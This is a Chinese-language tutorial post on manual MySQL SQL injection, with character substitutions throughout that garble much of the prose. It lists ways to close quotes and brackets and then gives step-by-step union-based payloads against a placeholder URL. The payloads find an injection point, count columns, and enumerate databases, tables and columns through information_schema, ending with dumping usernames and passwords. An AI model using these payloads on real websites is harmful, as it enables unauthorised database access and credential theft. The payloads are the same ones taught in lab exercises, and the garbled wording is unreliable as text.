mysql手工注入总结

mysql的注入，关键是要找到注入点，对注入点进行处理，该闭合的引号，括号等要先进行闭合，而后注释掉多余的语句

1、稍微总结下几种闭合方法：

通常来讲，程序员在书写select语句时，会对传入的变量进行一些处理，常见的有以下几种，这里以php为例，假设传输进来的变量为‘$id‘’,其余后端语言也相同。

select * from tables where id=$id;          #这种状况下，$id变量多为数字型    不须要闭合符号，能够直接注入，但若是系统作了只能传入数字型的判断，就没法注入
select * from tables where id='$id';        #这种状况下，$id变量多为字符型    须要闭合单引号，能够用?id=1'这种形式闭合
select * from tables where id="$id";        #这种状况下，$id变量多为字符型    须要闭合双引号，能够用?id=1"这种形式闭合
select * from tables where id=($id);        #这种状况下，$id变量多为数字型    须要闭合括号，能够用?id=1)这种形式闭合
select * from tables where id=('$id');      #这种状况下，$id变量多为字符型    须要同时闭合单引号和括号，能够用?id=1')这种形式闭合
select * from tables where id=("$id");      #这种状况下，$id变量多为字符型    须要同时闭合双引号和括号，能够用?id=1")这种形式闭合
select * from tables where id=(('$id'));    #这种状况下，$id变量多为字符型    须要同时闭合单引号和两层括号，能够用?id=1'))这种形式闭合

有些语句还有limit子句，如select * from tables where id='$id' limit 0,1;，咱们能够经过上面提到的方法先闭合单引号，而后用%23，即注释符注释掉后面的语句，具体写法以下：?id=1'%23；便可闭合输出正确的语句

*注：这里只列举几种常见的写法，能够结合实际状况，进行闭合符号，没有什么固定的方式，但最终达到一个目的就行了，就是闭合语句中可能有的符号，注释掉咱们不须要或者可能会限制咱们继续注入的部分。使得咱们注入这些闭合原有语句的符号后，获得的语句仍是正确而且可被执行的。

2、手工注入

第一步：找到注入点

在变量可控的部分加入一些符号，查看页面是否正常，举个例子：

有这么一个网站www.example.com/index.php?id=1

能够看到，这里的id变量是用户可控的，能够在id=1后加一个单引号，变成id=1' 。页面若是报错多了一个单引号，那么说明可能存在注入点。

也能够在id=1后经过and符号多增长多个判断，若是‘id=1 and 1=1’页面正常，‘id=1 and 1=2’时页面不正常，则这个页面边可能存在注入。

这里为何一直说可能呢？由于有些页面可能在返回结果出作过滤，虽然你这里带入数据库是能够被查询的，但没法返回，是否能够利用须要结合具体状况对待，也有多是被重定向进入到一个蜜罐中，故意放行，捕获入侵行为，但这个通常不会碰到。

第二步：就是闭合语句

参照最开始提出的几种闭合方法，对语句进行闭合。这里再也不赘述，这里特别说一下注释掉不须要语句的问题。

若是在第一步的数据库报错中出现了limit附近的语法错误，通常来讲，原有语句中的这个limit咱们是没法利用的，多半可能会致使咱们的闭合没法完成，并且为了后续便于咱们遍历数据库，咱们须要注入一个咱们可控的limit子句，因此须要注释掉原有语句的limit子句，防止冲突。可使用%23（#），--%20 %23这些数据库注释符号，进行注释。举个例子：

有这么一个网站：www.example.com/index.php?id=1

他在数据中的查询语句是select * from table where id='$id' limit 0,1;

那么咱们注入的语句就能够是?id=1' %23

这个时候，带入到数据库查询的语句就变成了select * from table where id='$id' #' limit 0,1;

#会把后面的语句注释掉，而后咱们获得实际执行的语句就成了select * from table where id='$id';

还要说一下，咱们在注入的时候，为何使用的%23而不是#呢，由于因为编码的问题，在浏览器中直接提交#会变成空，因此咱们使用url编码后的#，即%23，当传输到后端时，后端语言会对它自动解码成#，才可以成功带入数据库查询。

第三步：通过前面两步，咱们已经经过闭合和注释，构造出了一段空白区域，这段空白区域可使得咱们注入查询语句并得以带入执行。

前两步的工做很是重要，若是不作前面两步，或者前面两步作很差，在这一步时，你就还要去调整语句，那么一长串的报错，会很奔溃，因此我特别推荐，先去作前两步，使得语句该闭合的闭合，该注释的注释，那么注入的闭合符号和注释符号之间就是咱们的注入地带。会为接下来的步骤省去不少精力。

接下来仍是以www.example.com/index.php?id=1，在数据查询语句为select * from table where id='$id' limit 0,1;做为示例。

（1）先经过order by 子句判断有几个字段。

payload:?id=1' order by n %23

若是n为3时页面正常，n为4时页面不正常，则能够判断有三个字段。这里就假设咱们获得的n为3，继续举例。

 

（2）经过and 1=2 union select 1,2,3……,n联合查询判断显示字段是哪些

payload:?id=1' and 1=2 union select 1,2,3……n  

#这里的n为咱们上面经过order by n测试出来的那个值，这里咱们取3。因此实际注入时就是?id=1' and 1=2 select 1,2,3

提交后，能够看到页面中出现能够被显示的字段编号，咱们经过在响应位置替换成咱们须要的查询字段和表就能够，如这里，我注入出来的是2和3位置能够被注入，也就是接下来全部注入的内容更都须要替换这里select语句中的2和3

（3）暴出当前库和版本

payload:?id=1' and 1=2 union select 1,database(),version() %23

（4）暴出其余数据库

payload:?id=1' and 1=2 union select 1,schema_name,3 from information_schema.schemata limit 0,1%23

经过调整limit便可遍历出全部的数据库，调整方法为limit 0,1;limit 1,2;limit 2,3……直到出现错误或异常

（5）暴对应数据库的数据表

payload:?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=数据库名的十六进制 limit 0,1%23

这里我用当前数据库来作演示，即security库

遍历也是经过调整limit来实现的，方法同上

（6）暴对应数据库、数据表的各个字段

 payload:?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=库名十六进制  and table_name=表名十六进制 limit 0,1%23

这里我用security库和security中的users表来作演示

遍历也是经过调整limit来实现的，方法同（4）

（7）暴数据，也就是咱们常说的脱库

payload:?id=1' and 1=2 union select 1,字段名,3 from 库名.表名 limit 0,1%23

这里因为2和3位都是可用的，因此我能够在两个位同时显示两个字段。这里选用了security库的users表，咱们只关注用户名和密码字段，因此只暴这两个字段便可

遍历也是经过调整limit来实现的，方法同（4）

 

参考文章：

https://www.waitalone.cn/mysql-injection-summary.html

http://www.jb51.net/hack/41493.html